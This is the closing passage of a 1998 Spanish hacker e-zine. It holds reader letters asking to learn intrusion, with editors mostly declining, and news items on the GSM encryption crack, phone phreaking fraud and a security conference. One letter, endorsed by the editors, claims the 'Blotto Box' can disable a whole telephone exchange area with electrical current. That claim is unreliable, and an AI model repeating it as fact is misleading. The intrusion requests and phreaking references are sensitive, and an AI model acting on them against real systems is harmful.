- From: "Arturo Villal\sn Villa" <avillalo@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: Problemas con algunas de sus secciones
-
- Tengo problemas al intentar bajar algunos de los archivos de su pagina
- estos son:
- Seccisn HACK Novell (no se puede obtener ninguna utileria)
- Utilidades de Encripcisn (no se puede obtener ninguna utileria)
- Utilidades Network-Hacking (no se puede obtener ninguna utileria)
-
- ? Que es lo que esta pasando en sus servidores o cual es la razsn de
- este problema ?
-
- ? Tienen una direccisn FTP para obtener mas rapidamente estas utilerias
- asm como los archivos de Virus Informaticos, de ser asm, podrman darme
- la direccisn para tomarlos ?
-
- Saludos
-
- <------>
-
- [ Es normal que siempre haya algun enlace que no este disponible, ya que el
- web es muy dinamico, ademas que algunas de esas secciones que mencionas
- hay un MENSAJE QUE PONE QUE DE MOMENTO ESTA OFF-LINE , pero en fin ...
- Las razones son muy variadas, por desgracia, pero procuramos estar siempre
- con lo mejor y mas actualizado ;-) Sobre virus tienes la seccion de
- virus que seguro te gustara. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Wed, 20 May 1998 07:34:44 GMT
- From: "David Gallego Laredo" <dgall@xxxxxxxxxxxxxx>
- Subject: listado unfrateful.java
-
- EN PRIMER LUGAR ME GUSTARIA FELICITAROS POR VUESTRO E-ZINE, ES EL MEJOR QUE
- HE LEIDO HASTA EL MOMENTO EN CASTELLANO, SOY UN AFICIONADO AL HACK Y
- DESEARIA COMENTAROS UN PROBLEMA QUE ME HA SURGIDO CON UNO DE LOS LISTADOS
- EN JAVA PUBLICADOS EN VUESTRO CUARTO E-ZINE. EN CONCRETO SE TRATA DEL
- "UNGRATEFUL.JAVA" EN EL CUAL MEDA UN ERROR AL COMPILARLO CON EL VISUAL J++
- 1.1.
-
- EL ERROR ES EN LA INSTRUCCION:
- ErrorMessage err = new ErrorMessage();
-
- ME DICE QUE NO HE DEFINIDO LA CLASE ErrorMessage.
- NO SE NADA DE JAVA DE MOMENTO, Y ESPERO ME PODAIS HECHAR UNA MANO PARA QUE
- ESTE PROGRAMA FUNCIONE Y PODER PROBARLO Y ESPERIMENTAR UN POCO CON EL.
-
- ESPERO NOTICIAS VUESTRAS, GRACIAS Y HASTA OTRA.
-
- <------>
-
- [ Pues definela ;-) por ejemplo, pero lo mejor es que pilles algun libro o
- busques algun curso de Java por la Red, que te pueda ayudar.
- Thx por los cumplidos :) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sat, 23 May 1998 23:43:47 GMT
- From: Edgardo Mayer <horizonte@xxxxxxxxxxxxxx>
- Subject: INFO
-
- Podrmas darme direcciones de E-mail de colegas-hackers argentinos.
- Busco sean argentinos por la parte de la telefonma se
- refiere(phreakers).
-
- Gracias y ixitos
-
- Edgardo
-
- <------>
-
- [ Pues nosotros no conocemos ningun phreaker o hacker argentino, pero
- si alguien lo es, que nos envie un mail y os pondremos en contacto,
- okis ? ;-) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: "raul diaz" <rul_diaz@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: Saludos...!!!
-
- Antes que nada los felicito por su pagina, son muy interesantes los
- temas que ahi describen...
-
- f e l i c i d a d e s . . . ! ! !
-
- Les escribe un fiel aficionado a los hackers, pero apenas soy un bebe en
- esto, por eso les escribo para pedirles que hechen una mano, y me
- enseñen a hacer esto...
-
- Donde yo trabajo, hay una gran red de tipo T1, espero me puedan mandar
- algo de informacion para hacer algo por aca....
-
- Tambien quisiera (si no es mucha molestia) que me ense±aran desde lo
- basico, como les digo soy un fiel aficionado y me fascina esto...
-
- Como ustedes dicen: La informacion viaja y es libre.... (claro sin dañar
- a nadie).
-
- Bueno, espero me contesten.....
-
- atte: Un ser al que le gusta la superacion.... Slash. ;-)
-
- <------>
-
- [ Thx :) pero como siempre nuestro consejo que es leas este ezine con
- mucha atencion y experimentes por tu cuenta. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Tue, 26 May 1998 22:18:36 GMT
- From: cubikice@xxxxxxxxxxxxxx
- To: jjf_team@usa.net
- Subject: Holas!! estoy vivo!! :-)
-
- Hola!!
- Queria responderos al mail que me enviasteis hace + o - una semana
- en la que me deciais que ibais a publicar mi articulo y nada, que queria
- daros las gracias, estoy preparando otro articulo, este de mi cosecha
- aunque no se si os lo llegare a enviar, lo veo un tanto verde
- El caso es que ahora mi placa base se la he tenido que dejar a mi novia :-)
- total que estoy tirando de 486 y no puedo enchufar mis HD's de siempre
- asi que os envio esto desde la web y con el LYNX, joder!
- (y es que tampoco tengo CD-ROM), total que voy con un Linux descafeinado
- y totalmente desconfigurado, menos mal que aun asi voy haciendo cosillas.
- Bueno, no os pego mas la paliza, vais alguna vez por el IRC? me gustaria
- chtear un rato con alguno de vosotros algun dia.
- Pues nada, eso es todo.
- Un saludo!! cubikice@xxxxxxxxxxxxxx
-
- <------>
-
- [ Okis, y estamos esperando ese arti :) siempre puede ser util para alguien
- y eso es lo que pretendemos en este ezine.
- Sobre lo de IRC, pues no, ya que no nos interesa mucho. Para estar
- en contacto con nosotros pues E-mail :) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Fri, 29 May 1998 20:51:46 GMT
- From: RAFAEL TREJO OLVERA <a75878@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: Zic
-
- Hola quisiera que me ayudaran para poder ser un hacker.
- Mi e-mail es Zic97@xxxxxxxxxxxxxx
- De cualquier manera mandemen informacion sobre hackers o programas.
- y les pido la direccion de un chat de hackers.
-
- <------>
-
- [ Pues como ya hemos repetido tantas veces lee este ezine y nosotros no
- podemos enviar nada a nadie, okis ?
-
- #hacker
- #hack
- #hack_novatos
- #hackers
- #hack_the_world
- #hackgov ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Wed, 27 May 1998 13:23:08 GMT
- From: Liang Xiao Zhu <casazhu@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: Un saludo
-
- Hola conde vampiro, quiero que me enseñes como entrar al ordenador de
- otra persona.
- No voy ha hacer nada ilegar solo soy cybernauta que quiere aprender algo
- mas, gracias.
-
- <------>
-
- [ Pues como siempre decimos no damos clases privadas y YA ESTA BIEN DE
- RECIBIR ESTE TIPO DE MAIL'S, OKIS ? Para eso tienes vuestro/nuestro
- ezine. ]
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Thu, 04 Jun 1998 04:32:33 GMT
- From: "Damian Broy" <dbroy@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: sugerencia.....
-
- Hola muchachos, visite su page en la red y me percate de que en la
- seccion de boxes hay un error en la Blotto Box. Esta solo sirve para
- paralizar (o hacer mierda, anyway) toda una zona correspondiente
- a un prefijo de caracterisitica telefonica, por medio del simpatico
- envio de un gran flujo electrico a travez de la linea telefonica.
- Espero haber sido util y los felicito por su pagina, si mi
- interpretacion fue considerada erronea por uds pido disculpas.
- suerte!!!!!!
- Cook2.
-
- Damian Broy
-
- dbroy@xxxxxxxxxxxxxx
-
- <------>
-
- [Thx por la informacion. Prometemos cambiarlo lo antes posible. Y no te
- preocupes, tu interpretacin es correcta, cualquiera puede tener fallos
- :-) ]
-
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- ------------------------
- - NOTICIAS UNDERGROUND -
- ------------------------
-
- - J.J.F. / HACKERS TEAM -
-
- <────────────────────────────────────────────────────────────────────────────>
-
- I JORNADAS SOBRE SEGURIDAD EN LAS NUEVAS TECNOLOGIAS
-
- 14, 15 y 16 de Agosto
- Madrid
- _ _ _ _ _ _ _ _ _
- _.-' `-._.-' `-._.-' `-._.-' `-._.-' `-._.-' `-._.-' `-._.-' `-._.-' `-.._
-
- Durante mucho tiempo hemos notado la falta de unas jornadas de estas
- caracteristicas, en las que se acercara a la gente de a pie los aspectos
- man interesantes de la seguridad informatica y las telecomunicaciones.
-
- Por primera vez en Espa±a queremos organizar estas jornadas que den
- pie a la realizacion de otras muchas y que esperamos tengan su continuidad
- en proximos a±os.
-
- Para eso contamos con el respaldo oficial de la asociacion de estudiantes
- ACD, a la que desde ya agradecemos su participacion y esperamos contar con
- ellos en las futuras ediciones de SET CON
-
-
- -[ QUE ES SET CON ]-
-
- SET CON no es ni mas ni menos que una reunion de gente interesada en los
- temas de seguridad en redes, seguridad informatica, programacion,
- comunicaciones...
-
- Para estas primeras jornadas disponemos de un ciclo de conferencias,
- nuestra Secure Party, proyecciones de video, concursos, y el resto de
- actividades que se nos vayan ocurriendo. Para ello, necesitamos de vuestra
- colaboracion.
-
-
- -[ CONFERENCIAS ]-
-
- En un principio estan previstas tres conferencias o debates por dia,
- exceptuando el domingo, en el que solo habra una conferencia.
-
- En el momento de escribir este anuncio tenemos preparadas estas
- conferencias:
-
- * "Seguridad en Windows NT"
- Conferencia en la que Chessy nos hablara del sistema
- operativo Windows NT.
-
- * Legislacion y delito informatico
- * Virus
- Posible participacion de Anyware y Panda. Nos gustaria
- que la gente del 29A tambien participase.
- * ...
-
- Los que esteis interesados en participar en alguna conferencia o alguna
- mesa redonda, escribid a <setcon@bigfoot.com>, indicando claramente sobre
- que quereis hablar, que dias teneis disponible, y cual es vuestro nombre.
-
-
- -[ CAMPEONATOS ]-
-
- Para demostrar nuestros conocimientos o simplemente pasar un buen rato,
- con la posibilidad de importantes premios.
-
- { Trivial Security Edition }
-
- Que decir sobre este entretenido juego de toda la vida. Pon a prueba
- tus conocimientos en los mas diversos temas como criptografia,
- sistemas operativos, protocolos, lenguajes de programacion,
- telefonia o hardware. Quien sera el ganador???
-
- { Campeonato de Quake }
-
- Nada que ver con la seguridad, pero si con pasar un buen rato.
- Simplemente por eliminacion, a ver quien es el mas violento, el mas
- listo, el mas... Quake
-
- { Barricada }
-
- El campeonato mas interesante de todos. Coge tu equipo y conectalo
- a la red barricada. Lo unico que tienes que hacer es conseguir
- que tu ordenador mantenga un servidor HTTP (puerto 80), servidor
- de correo y servidor de FTP. Pero eso no es todo. A cada participante
- se le suministrara un archivo, que tendra el mismo nombre para
- todo el mundo y debera estar en el mismo directorio, aunque el
- contenido no sera el mismo. No ganara el que mas tiempo este
- operativo. Tampoco sera el que obtenga mas archivos ajenos. Sera
- el que consiga ambas cosas a la vez.
-
- { Gymkana }
-
- El ultimo dia se realizara una gymkana en los alrededores del local
- de las Jornadas. Se trata de demostrar que tambien tenemos algo de
- fisico ;)
-
- Habra pruebas tradicionales como el lanzamiento de discos duros
- (si alguien los presta), o el de diskettes, hasta pruebas nuevas
- como determinar la informacion de una tarjeta perforada... por
- el tacto
-
-
- -[ PREMIOS ]-
-
- Parte de los premios pueden salir de donaciones. Asi que esperamos
- vuestro apoyo en este aspecto. Personalmente considero como un gran
- premio la obtencion de un speccy original ;)
-
-
- -[ PROYECCIONES ]-
-
- Durante las jornadas se proyectaran peliculas que hayan tenido o tengan
- algo de importancia dentro del mundo de la seguridad informatica. Seran
- peliculas como "Juegos de Guerra", "Fisgones" y hasta incluso "Hackers"
- (Alguna habra que criticar, no? ;) )
-
-
- -[ MISC ]-
-
- Quedan por resolver temas de alojamiento, transporte, horarios. Permaneced
- atentos a la pagina de SET (http://www.geocities.com/SiliconValley/8726),
- sonde apareceran los proximos anuncios y el enlace a la pagina de la
- SET CON 98.
-
- Para cualquier tipo de duda o colaboracion, escribid a
- <setcon@bigfoot.com>
-
- Have P/Hun
- Falken
-
- <────────────────────────────────────────────────────────────────────────────>
-
- CRACKEADO EL ALGORITMO DE LOS TELEFONOS DIGITALES (GSM).
-
- Investigadores crackean el codigo de los Telefonos Celulares
- por John Markoff
-
- San Francisco - En un logrado intento de crack un conocido metodo de
- encriptacion para prevenir la clonazion de los telefonos digitales moviles,
- un grupo de investigadores informaticos de la Universidad de California
- creen que tiene importantes evidencias que el sistema empleado por los
- telefonos es deliberadamente debil para permetir la vigilancia del gobierno.
-
- El metodo crackeado es conocido como GSM (Groupe Speciale Mobile). El
- sistema de encriptacion mas usado en el mundo para los telefonos celulares,
- el GSM es usado en unos 80 millones de aparatos alrededor del mundo y al
- menos unos 2 millones de telefonos en los Estados Unidos.
-
- Mas de los 58 millones de telefonos analogicos y digitales americanos
- estan basados en una variedad de otros metodos, pero 20 compañias americanas
- dedicacas a telefonia digital celular incluidas Pacific Bell, una division
- de SBC Communications, y Omnipoint corp. utilizan el estandar GSM.
-
- Dos investigadores de la Universidad Californiana Berkeley anunciaron
- el pasado Lunes que ellos havian logrado romper el metodo GSM usando un
- ordenador para determinar el numero secreto guardado en el Subscriber
- Identify Module (SIM), una especie de tarjeta de credito dentro del
- telefono.
-
- Si los criminales pudiesen crackear el metodo, ellos podrian clonar
- los telefonos protegidos mediante encriptacion GSM, para ello, tendrian que
- detectar un numero de un telefono y usarlo en otro telefono para fradulentar
- las llamadas. Por otro lado, los investigadores y los representantes de las
- compañias telefonicas celulares dijeron el Lunes que el uso de la clonacion
- era remota en comparacion con la vulneravilidad de los telefonos analogicos
- celulares. Por una cosa en concreto, ya que dijeron, que para crackear el
- GSM se requiere al menos unas 10 horas de pruebas electronicas y la
- utilizacion de maquinas muy potentes.
-
- Lo que era mas intrigante todavia que el hecho de la seguridad, era
- que crackeando el codigo se descubrio que el llave digital usada en los GSM
- posiblemente fue manipulada durante el proceso de diseño para permitir a
- las agencias gubernamentales espiar las conversaciones celulares.
-
- Aunque la llave. conocida como A5, es un sistema de encriptacion de
- 64 bit, generalmente un codigo dificil de crackear, los investigadores han
- determinado que los ultimos 10 digitos eran actualmente ceros. Esto
- significa que con potentes ordenadores, sistemas utilizados por las
- agencias de inteligencia gubernamentales, puede ser posible decodificar una
- conversacion telefonica rapidamente, explica Marc Briceno, director de la
- Smartcard Developers Association, una pequeña organizacion de programadores.
- "Aparemente la llave se debilito intencionadamente", dice. "Y no puedo
- pensar en ninguna razon para hacer esto intencionadamente".
-
- Durante los ultimos años, la industria informatica esta plagada de
- rumores sobre que las agencias gubernamentales han forzado o persuadido a
- los desarrolladores de cripto sistemas a implementar debilidades matematicas
- en los sistemas de seguridad o incluso puertas traseras. Algunos de estos
- rumores hablan sobre la N
- 1005
- SA (National Security Agency) o la CIA (Central
- Intelligence Agency) que teniendo ellos mismos criptografos, diseñando
- programas criptograficos para ellos mismos y despues lo liberan, para
- asegurarse que ellos pueden decodificar datos informaticos o conversaciones
- telefonicas.
-
- Algunos rumores han cogido importancia, en parte, sobre el autentico
- origen del sistema GSM. Expertos criptografos dicen que las primeras
- formulas matematicas, o los algoritmos, en el sistema criptografico GSM
- proviene originalmente de Alemania o Francia como parte de una creacion
- sobre un estandar en los años 1986 y 1987.
-
- "Es imposible esto hacer esto, por lo que debe haber otras razones",
- alega Stewart Baker, un abogado de Washington que fue antiguamente abogado
- de la NSA. La NSA es una de las agencias mas acusadas de sospecha debido
- en mayor parte ya que su mision es interceptar llamanadas telefonicas.
- "La especulacion es facil, y nunca muere", dice.
-
- Aunque, muchos expertos de la industria no pueden pensar en una buena
- razon de porque un algoritmo encriptador debe ser debilitado
- intencionadamente, otra razon que para permitir la vigilancia.
-
- "Esto a sido debilitado intencionadamente", dice Phil Karn, un
- ingeniero de la Qualcomm Inc., una compañia de telefonia celular que ha
- desarrollado un estandar alternativo al GSM. "Quien crees que esta
- interesado en hacer una cosa como esa?".
-
- La debi llave fue descubierta por dos investigadores. Ian Goldberg y
- David Wagner, ambos miembros de la universidad de California en el grupo de
- Aplicaciones de Seguridad en Internet, Autentificacion y Criptografia en
- Berkeley. Ellos hicieron hincapie en que habian detectado facilmente el
- fallo de seguridad que permite clonar los telefonos celulares.
-
- La industria de la telefonia celular es consciente del fallo en los
- GSM pero dice que realmente a reforzado su justificacion en la seguridad
- de los telefonos digitales.
-
- "Me quito el sombrero antes estos muchachos, han hecho un magnifico
- trabajo," dice George Schimtt, presidente de la Omnipoint. "Yo les daria
- credito, pero no estamos en peligro de fraude."
-
- Los investigadores y la Smartcard Developers Association dicen que el
- exito del ataque se debe a las nuevas evidencias de las practicas de la
- industria a esconder las tecnicas de seguridad del publico. La autentica
- seguridad, ellos alegan, requiere la publicacion de los algoritmos para
- que expertos independientes puedan verificar la fuerza del sistema.
-
- "Esto demuestra otra vez un fallo en un proceso de diseño cerrado."
- dice Briceno. "Estas compañias se privan ellos mismoa de la seguridad, pero
- ahora las gallinas han llegado a casa para freirse".
-
- Link's Relacionados:
-
- Another GSM crack info page at
- http://www.isaac.cs.berkeley.edu/isaac/gsm-faq.html
-
- The GSM algorithm, COMP128 can be seen in a C program source code at the
- SmartCard Developers Association Web site at
- http://www.scard.org/gsm/a3a8.txt
-
- European Telecommunications Standard Institute main page at
- http://www.etsi.fr/
-
- Info about SIM at
- http://www.etsi.fr/brochures/stateart/vedder.htm
-
- <────────────────────────────────────────────────────────────────────────────>
- HACKERS DEL SERVICIO SECRETO INCAPACES DE CRACKEAR UNA INTRANET.
-
- PA 4/21/98 11:06 AM
-
- By Giles Turnbull, PA News
-
- Hackers profesionales del servicio secreto fueron pillados en un
- intento de hackear el sistema de comunicaciones interno de seguridad del
- Gobierno, que fue puesto en marcha hoy mismo.
-
- Durante el desarrollo y planificacion de la Intranet, gente del GCHQ
- y otros organismos de seguridad similares tambien fueron pillados en un
- intento de hackear el sistema
-
- Pero ellos fallaron.
-
- Por otro lado, el ministro encargado del projecto admitio hoy que
- mirando los hackeos en los sistemas del Pentagono y de la Nasa en los
- EE.UU., el no puede decir que la nueva Intranet sea imposible de crackear.
-
- La Intranet Segura del Gobierno, The Goverment Secure Intranet (GIS),
- permitira a los ministros y gente del gobierno a comunicarse mediante
- e-mail y usar la herramienta cotidiana del Gobierno, conocida como Agenda.
-
- Una Intranet es un sistema de Internet cerrado que solo puede ser
- accedido por ciertas personas. Es un metodo muy popular en grandes compañias
- y organizaciones para sus comunicaciones internas.
-
- La primera fase del GIS, lanzada hoy, estara disponible para unas
- 400 personas que tiene permiso para ver documentos clasificados.
-
- La segunda fase, dentro de algunos meses, sera vista por unas 400,000
- personas y se incluiran documentos confidenciales.
-
- Nada clasificado como secreto sera puesto en la Intranet, dice el
- ministro en el cargo David Clark, Canciller del Ducado de Lancaster.
-
- Dr Clark dice que el comienzo del sistema a sido crucial para el
- futuro de un gobierno electronico.
-
- "Esto a sido el comienzo del futuro sistema de funcionamiento del
- gobierno", alega.
-
- "Es una revolucion en el modo de hacer gobierno. Cuando llege al
- cargo hace un año yo estaba sorprendido de que no havia nada sobre
- seguridad electronica en las comunicaciones de los diferentes
- departamentos.
-
- "Muy pronto en el desarrollo del sistema invitamos a dos grupos de
- Hackers del gobierno y les ofrecimos el reto de hackear el sistema. Incluso
- les contamos como funcionaba pero aun asi no consiguieron romper la
- seguridad".
-
- "Estoy muy seguro de que sera muy, muy dificil tal vez, pero no
- imposible, romper la seguridad" añade Dr Clark.
-
- El GIS fue inagurada hoy en 6 departamentos del Gobierno, y la
- segunda fase empezara dentro de 6 semanas. Otros departamentos estan
- esperando para unirse en los proximos meses.
-
- <────────────────────────────────────────────────────────────────────────────>
- ATAQUE HACKER DURANTE EL CHAT DE YELTSIN.
-
- MOSCOW, May 13
-
- Los rusos dicen que han detenido 20 intentos de dejar desconectados
- los servidores de Moscu.
-
- Las autorirades rusas dicen de haber detenido unos 20 intentos por
- Hackers de desconectar el ordenador en el cual el presidente Boris Yeltsin
- estaba usando para su primera charla en Internet en MSNBC.
-
- La agencia de noticias entrevisto a un official de la Agencia Federal
- para las Comunicaciones e Informacion Gubermental, Federal Agency for
- Goverment Communication and Information (FAPSI) diciendo que los Hackers
- intentaron desconectar el servidor, refiriendose a la red gubernamental
- que provee el intercambio de mensajes entre Yeltsin e Internet.
-
- Chris Donohue, quien estuvo media hora en la sesion de chat en MSNBC,
- dijo que no a havido aparentemente ningun asalto en los servidores de la
- compañia, los cuales usan ingles para responder y preguntar. "Nuestro
- servidor funciono perfectamente, y ningun ataque fue notificado por nuestro
- equipo", dice.
-
- Donohue dice que alrededor de unas 4000 personas se unieron al chat.
- Los representantes del FAPSI alegan que unos 22,000 usuarios de Internet
- visitaron el servidor de chat.
-
- La charla se fue desplazando hacia las nuevas leyes en las politicas
- de Moscu.
-
- Pero algunos navegantes del web aprendieron sobre las preguntaron
- qye le hacian a Yeltsin que su estado de salud es bueno en estos momentos,
- que nunca ha fumado un cigarro, y que su estilo de pelo se debe a la
- mujer de su vida y no por un pasado Irlandes y ademas dijo que no creia que
- Rusia este preparada para una mujer presidente.
-
- El FAPSI dijo que antiguamente sus lineas eran faciles de hackear
- mediante aparatos electronicos de alta tecnologia y sistema criptograficos.
-
- Varios Hackers adolescentes de diferentes paises, incluidos Rusia,
- han sido acusados de recientes asaltos a los sistemas informaticos del
- Pentagono en los EE.UU. y otras redes militares alrededor del globo.
-
- <────────────────────────────────────────────────────────────────────────────>
- AUSTRALIA: MILLONES EN PERDIDAS POR CULPA DE LOS PHREAKERS.
-
- 14 May 98 By ANDREW PROBYN.
-
- Millones de dolares estan siendo robados de los usuarios de telefonos
- en Australia debido a phreakers que utilizan elaborados scaners telefonicos.
-
- Viviendas, empresas y usuarios de telefonos mobiles estan siendo
- victimas de un gran y sistematico fraude telefonico. Las empresas Telstra
- y Optus han hecho avances en proteger sus redes de telecomunicaciones,
- pero los Hackers han incrementado sus entradas en la red para robar los
- codigos de los usuarios.
-
- El Herald Sun ha descubierto muchos casos en los cuales los Hackers
- eran acusados de estos actos, incluidos una vivienda que tiene una factura
- en llamadas por $10,000 que el niega haber hecho.
-
- Una investigacion del Herald Sun revela que: Llamadas eroticas en
- los Estados Unidos, la Guyana, la Republica Dominicana, Rusia y Chile son
- generalmente mamipuladas para aparecer en otras cuentas telefonicas.
-
- Los Hackers pueden manipular sus llamadas en Internet, locales e
- internacionales para que no sean detectadas.
-
- Las empresas con centralitas internas, PABX, son particularmente
- vulnerables y son frecuentementes usadas por los Hackers.
-
- Los telefonos mobiles aunque sus mecanismo de seguridad pueden ser
- clonados usando su tarjeta SIM, el chip ID que controla la factura.
-
- Wally Rothwell, representante de la industria de las
- telecomunicaciones, dice que el hacking se ha vuelto una costosa realidad.
-
- "El hacking le puede costar a los cosumidores unos millones de
- dolares," dice. "Algunas de estas llamadas son muy caras - llamadas
- eroticas, por ejemplo, puede costar solo $30 el ya conectar." Durante Enero
- y marzo de este año, viviendas y pequeñas empresas niegan haber hecho esas
- llamadas.
-
- Mr Rothwell dice que esto es "phreaking" - un faude en el cual el
- coste de las llamadas son dirigidas hacia otro usuario - y ha sido probado
- en las centralitas. "Por otro lado, tenemos que comprobar si el hacking se
- puede hacer remotamente o desde fuera de la centralita de telefonos."
-
- Pero un experto phreaker conto al Herald Sun que los Hackers
- establecieron hace algunos años ya como realizar llamadas ilegales en las
- centralitas desde lineas externas.
-
- "Cuando yo hacia esto usaba mi ordenador para programar la centralita
- para hacer lo que yo quisiera que hiciese," dice Mr Dedio.
-
- "Los phreakers expertos suelen usar lineas normales y ordenadores de
- sobremesa para generar ciertos sonidos para abrir la centralita" dice.
-
- El dice que los Hackers tambien acceden a las lineas privadas
- manipulando los pitidos de las centralitas en las calles. Ellos pueden
- facilmente dirigir llamadas hacia los vecinos, dice, pero esto peligroso.
-
- "Si puedes meterte en una centralita no hace falta que robes la linea
- telefonica de alquien," dice.
-
- La figura principal del Queensland University of Technology's school
- of data comunications, el profesor Bill Caelli, dice que ni siquiera las
- sofisticadas redes estan a salvo.
-
- Muchas compañias con sistemas PABX han sucumbido por los miles de
- millones en fraude telefonico en el Reino Unido, los Estados Unidos y
- Canada. Investigadores de la Universidad de Berkeley, California, el mes
- pasado probaron que los telefonos digitales ya no era seguros, clonando
- el chip SIM que controla la factura, dice.
-
- La Autoridad Australiana en la Comunicaciones dice que las grandes
- compañias tiene que tener extremo cuidado. "Cuanto mas grande es la
- compañia, mas grande es la factura y mas facil es para el Hackers
- esconderse," dice el representante Frank Nowlan. La pena maxima por
- phreaking es de cinco años en prision bajo el Acta Federal de Crimenes.
-
- El relaciones de Telstra Stephen Nason dice que Telstra cree que su
- red de seguridad es la mas segura del mundo contra los Hackers. "Como
- ninguna red es 100% segura, nosotros creemos que la red de Telstra es
- muy segura," dice.
-
- El hacking no se esta expandiendo, dice, con probablemente unos 50
- casos por año en Australia. El relaciones de Optus Kristin Meagher dice
- que Optus no tiene evidencia alguna de hacking en sus redes.
-
- (C) 1998 Herald and Weekly Times Limited.
- HERALD SUN 14/05/98 P7
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- Bueno, pues aqui acaba el numero cinco y ademas tambien nuestro
- primer volumen, que visto los mail's recibios y haciendo balances de los
- articulos aportados por los lectores, pues ha gustado mucho. Por supuesto
- esto es solo el principio, pero esto no se podra conseguir ni no nos
- ayudais aportando articulos, okis?
-
- Pues esto acaba por hoy y esperamos oir de vostros, vuestras
- felicitaciones, quejas, criticas, articulos o actos de hack, pues escribe a
- nuestro buzon y si tiene miedo pues ya sabes usa nuestra llave publica PGP.
- Escribe!!!!!!!
-
- jjf_team@usa.net
-
-
- ADIOS Y HASTA EL SIGUIENTE NUMERO!!!
- - J.J.F. / HACKERS TEAM -
-
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-
-
-